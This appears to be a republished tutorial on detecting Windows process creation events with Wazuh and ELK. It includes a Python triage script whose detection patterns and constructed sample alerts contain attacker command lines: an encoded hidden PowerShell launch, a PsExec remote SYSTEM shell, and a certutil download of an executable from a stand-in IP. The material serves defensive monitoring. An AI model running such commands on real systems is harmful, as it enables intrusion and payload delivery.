
Mastering Threat Detection: A Guide to Monitoring Windows Process Creation with Wazuh
Every second, thousands of processes are launched and terminated across your Windows environment. While the vast majority are routine and harmless, hidden among them could be the critical first signs of a security breach. Unauthorized software, malware execution, and lateral movement attempts all begin with a single action: creating a new process. Without visibility into this fundamental activity, security teams are effectively flying blind.
This guide provides a comprehensive walkthrough on how to harness the power of Wazuh and the ELK Stack to monitor Windows process creation events, turning raw log data into actionable security intelligence.
Why Is Process Creation Monitoring So Important?
Monitoring process creation is a cornerstone of modern endpoint security and threat hunting. By scrutinizing which processes are starting, who or what started them, and with what commands, you gain invaluable insight into the health and security of your systems.
- Early Malware Detection: Many types of malware, including ransomware and trojans, reveal themselves by launching suspicious processes or using legitimate tools like PowerShell for malicious purposes. Tracking process creation is your first line of defense in spotting these anomalies.
- Identifying Unauthorized Software: If an employee installs unapproved software, you’ll see the setup process launch. This helps enforce IT policies and reduce the attack surface created by shadow IT.
- Uncovering Lateral Movement: Attackers who have gained a foothold often use tools like PsExec or Windows Management Instrumentation (WMI) to execute commands on other machines. Monitoring parent-child process relationships (for example, services.exe spawning the PsExec service binary PSEXESVC.exe on the target host, or wmiprvse.exe spawning cmd.exe) can expose these lateral movement techniques.
- Investigative Forensics: In the event of an incident, a detailed audit trail of every process that ran is crucial for understanding the attacker’s full chain of actions. This data helps answer critical questions about how the breach occurred and what data was compromised.
The Tools for the Job: Wazuh and the ELK Stack
To build a robust and scalable monitoring solution, we rely on two powerful open-source platforms working in tandem:
- Wazuh: A Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) platform. Wazuh agents are deployed on your Windows endpoints to collect logs, monitor for security events, and report back to a central Wazuh manager.
- The ELK Stack (Elasticsearch, Logstash, Kibana): A suite of tools for data storage, aggregation, and visualization. The Wazuh manager forwards its analyzed data to Elasticsearch for long-term storage and high-speed searching. Kibana provides a powerful web interface for creating dashboards and visualizing the data, making it easy to spot trends and threats. (Current Wazuh releases ship their own OpenSearch-based Wazuh indexer and Wazuh dashboard that fill the same two roles; the ELK pairing described here is the older deployment model, and everything below applies to either.)
Think of Wazuh as the on-site security guard on each machine, actively collecting intelligence, while the ELK Stack is the central command center where all that intelligence is organized, analyzed, and displayed on a monitor wall.
Step-by-Step: Implementing Process Creation Monitoring
Step 1: Enable the Windows Audit Policy
By default, Windows does not log process creation in the detail needed for security monitoring. You must enable the “Audit Process Creation” audit subcategory and, because the rest of this guide relies on seeing the command line, the separate policy that adds the command line to the event.
You can enable both using the Group Policy Management Console (GPMC) for domain-wide deployment or locally with the Local Group Policy Editor (gpedit.msc); the Local Security Policy editor (secpol.msc) exposes only the audit policy half.
- Navigate to:
Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking
- Enable “Audit Process Creation” for Success. (Failure auditing adds little for this subcategory; Success is what produces the events you want.)
- Navigate to:
Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation
- Enable “Include command line in process creation events”. Without it, Event ID 4688 records the process name but not its arguments.
Once enabled, Windows will begin logging Event ID 4688 in the Security event log every time a new process is started. This is the key event we need to capture. Each event names the new process, the account that created it and, on Windows 10 / Windows Server 2016 and later, the parent process (“Creator Process Name”); older versions record only the creator’s process ID, so parent-child analysis needs a PID lookup there. Expect a noticeable increase in Security log volume, so raise the log’s maximum size accordingly, and remember that captured command lines can contain passwords and other secrets passed as arguments, so restrict who can read the resulting alerts.
Step 2: Configure the Wazuh Agent
Next, you need to ensure the Wazuh agent on your Windows endpoints is configured to collect events from the Security log. The default Windows agent configuration already does this, but it’s essential to verify, and if your configuration adds a <query> filter to suppress noisy event IDs, make sure 4688 is not among the ones excluded.
In the agent’s configuration file (ossec.conf), ensure you have a block that monitors the Security event channel:
<localfile>
<location>Security</location>
<log_format>eventchannel</log_format>
</localfile>
The Wazuh agent will now forward Security events, including the crucial Event ID 4688, to the Wazuh manager for analysis. The manager’s default ruleset decodes each event into structured fields (the event ID as win.system.eventID, and the new process, parent process, command line and account as win.eventdata.newProcessName, parentProcessName, commandLine and subjectUserName, indexed under data.* in Elasticsearch). Alerting on specific process creation patterns is normally done with custom rules in local_rules.xml that match on those fields.
Step 3: Hunt for Threats in Kibana
With data flowing from your Windows endpoints through the Wazuh manager and into Elasticsearch, you can now use Kibana to hunt for threats. The Wazuh plugin for Kibana provides pre-built dashboards, but creating your own visualizations focused on process creation can be incredibly powerful.
Actionable Security Tips for Your Dashboards:
- Monitor for Suspicious Parent Processes: Create a visualization that shows uncommon parent-child relationships. For example, Microsoft Office applications (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE) should almost never be the parent of powershell.exe, cmd.exe, wscript.exe or mshta.exe. This pattern is a classic indicator of a malicious document macro.
- Track Command-Line Arguments: With command-line auditing enabled (Step 1), Event ID 4688 includes the full command line used to launch a process. Search for suspicious strings associated with living-off-the-land techniques, such as:
powershell.exe -enc (an encoded command, often used for obfuscation; -e and -EncodedCommand are equivalent spellings)
certutil.exe -urlcache -split -f (downloads a file from a URL, a common way to fetch a second stage)
schtasks.exe /create (creates a scheduled task, a common persistence mechanism)
- Create Alerts for High-Risk Events: Configure Wazuh rules (or Kibana alerting on the indexed data) to notify you immediately when a high-risk process is detected. For instance, trigger an alert if psexec.exe is seen running anywhere outside of your IT administrators’ workstations, and treat PSEXESVC.exe appearing on a server as the matching sign on the target side.
A Real-World Use Case: Detecting a Phishing Attack
Imagine a user receives a phishing email and opens a malicious Word document. Here’s how this monitoring setup would detect the attack:
- The user opens the document, launching WINWORD.EXE.
- The malicious macro inside the document executes, spawning a new process: powershell.exe.
- The Wazuh agent captures Event ID 4688, showing WINWORD.EXE as the parent process and powershell.exe as the new process. With command-line auditing enabled, the event also carries the full, obfuscated PowerShell command line.
- The Wazuh manager receives the event, and its rules flag it as suspicious.
- In Kibana, a security analyst sees this anomalous parent-child relationship on their dashboard and is immediately alerted to the potential compromise, allowing for rapid response before the attacker can escalate privileges or deploy ransomware.
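The dashboard tips above and the phishing chain in this use case, as detection logic run over sample events. This is an added example, not code from the original article or from the Wazuh project. It assumes the alert layout and field names Wazuh’s eventchannel decoder produces (data.win.system.eventID and data.win.eventdata.newProcessName, parentProcessName, commandLine, subjectUserName); the sample events, host names, PsExec allow-list, IP address and encoded payload are all constructed for the example.

```python
"""Triage Windows Event ID 4688 records in the JSON shape the Wazuh agent
forwards from the Security channel. Field names follow Wazuh's eventchannel
decoder; the sample events below are constructed, not real alerts."""
import re
from typing import Iterable

# Parents that should essentially never launch a scripting host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Living-off-the-land command-line patterns from the dashboard tips.
LOLBIN_PATTERNS = [
    ("encoded PowerShell command",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s+\S", re.I)),
    ("certutil download",
     re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("scheduled task creation",
     re.compile(r"schtasks(?:\.exe)?\b.*/create\b", re.I)),
]

# Hypothetical allow-list of hosts where PsExec is expected (assumption).
PSEXEC_ALLOWED_HOSTS = {"it-admin-01", "it-admin-02"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(alert: dict) -> list[str]:
    """Return the findings for one alert; an empty list means nothing notable."""
    win = alert.get("data", {}).get("win", {})
    if str(win.get("system", {}).get("eventID")) != "4688":
        return []  # only process creation events are in scope
    ev = win.get("eventdata", {})
    host = alert.get("agent", {}).get("name", "?").lower()
    child = basename(ev.get("newProcessName", ""))
    parent_raw = ev.get("parentProcessName")
    cmdline = ev.get("commandLine")
    findings = []

    # Parent-child check; older Windows versions log only the creator PID.
    if parent_raw is None:
        findings.append("no parent process name: host logs only the creator PID")
    elif basename(parent_raw) in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"Office parent {basename(parent_raw)} spawned {child}")

    # Command-line check; absent when command-line auditing is not enabled.
    if cmdline is None:
        findings.append("command line missing: enable 'Include command line in process creation events'")
    else:
        for label, pattern in LOLBIN_PATTERNS:
            if pattern.search(cmdline):
                findings.append(label)

    # High-risk tool outside the hosts where it is expected.
    if child == "psexec.exe" and host not in PSEXEC_ALLOWED_HOSTS:
        findings.append(f"psexec.exe on non-admin host {host}")
    return findings


def scan(alerts: Iterable[dict]) -> list[tuple[str, str, list[str]]]:
    """Run triage over a stream of alerts; return (host, new process, findings) for hits."""
    hits = []
    for alert in alerts:
        findings = triage(alert)
        if findings:
            ev = alert["data"]["win"]["eventdata"]
            hits.append((alert["agent"]["name"], basename(ev.get("newProcessName", "")), findings))
    return hits


def _alert(host: str, event_id: str, **eventdata) -> dict:
    """Build a minimal constructed alert in the layout Wazuh emits for eventchannel data."""
    return {"agent": {"name": host},
            "data": {"win": {"system": {"eventID": event_id}, "eventdata": eventdata}}}


# Constructed sample stream: benign launch, the phishing chain, PsExec on a
# user workstation, a certutil download, a legacy host, and a non-4688 event.
SAMPLE_ALERTS = [
    _alert("WS-FIN-07", "4688", subjectUserName="jdoe",
           parentProcessName=r"C:\Windows\explorer.exe",
           newProcessName=r"C:\Windows\System32\notepad.exe",
           commandLine=r'"C:\Windows\System32\notepad.exe" budget.txt'),
    _alert("WS-FIN-07", "4688", subjectUserName="jdoe",
           parentProcessName=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
           newProcessName=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           commandLine="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    _alert("WS-FIN-07", "4688", subjectUserName="jdoe",
           parentProcessName=r"C:\Windows\System32\cmd.exe",
           newProcessName=r"C:\Users\jdoe\Downloads\psexec.exe",
           commandLine=r"psexec.exe \\SRV-DB-01 -s cmd.exe"),
    _alert("SRV-WEB-02", "4688", subjectUserName="svc_web",
           parentProcessName=r"C:\Windows\System32\cmd.exe",
           newProcessName=r"C:\Windows\System32\certutil.exe",
           commandLine=r"certutil.exe -urlcache -split -f http://198.51.100.20/a.txt C:\Windows\Temp\a.exe"),
    _alert("SRV-LEGACY-01", "4688", subjectUserName="SYSTEM",
           newProcessName=r"C:\Windows\System32\schtasks.exe"),
    _alert("WS-FIN-07", "4624", subjectUserName="jdoe"),
]

if __name__ == "__main__":
    for host, proc, findings in scan(SAMPLE_ALERTS):
        print(f"{host}: {proc}: " + "; ".join(findings))
```

To try it on real data, read the manager’s archives.json (with logall_json enabled, so events that matched no rule are kept) or alerts.json one JSON object per line and pass each to triage. The same three checks map directly onto Wazuh custom rules that match on win.eventdata.parentProcessName, win.eventdata.commandLine and win.eventdata.newProcessName. The two advisory findings for the legacy host are deliberate: an event with no parent name or no command line is not an attack, but it tells you the audit configuration on that host is not giving you what the rest of the pipeline expects.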
Conclusion
Monitoring Windows process creation is not a luxury—it is a fundamental requirement for any effective security posture. By leveraging the combined strengths of Wazuh and the ELK Stack, you can gain deep visibility into your endpoint activity, detect threats in their earliest stages, and empower your security team with the data they need to conduct thorough investigations. Implementing this capability moves you from a reactive to a proactive security model, enabling you to hunt for threats before they cause significant damage.
Source: https://kifarunix.com/monitor-process-creation-events-on-windows-systems-using-wazuh-and-elk-stack/


